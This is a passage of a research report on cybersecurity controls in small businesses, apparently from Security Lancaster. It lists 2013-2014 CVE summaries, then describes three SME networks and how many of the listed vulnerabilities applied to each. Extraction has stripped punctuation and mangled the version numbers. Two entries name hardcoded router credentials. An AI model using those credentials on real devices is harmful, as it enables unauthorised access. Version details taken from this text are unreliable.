CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
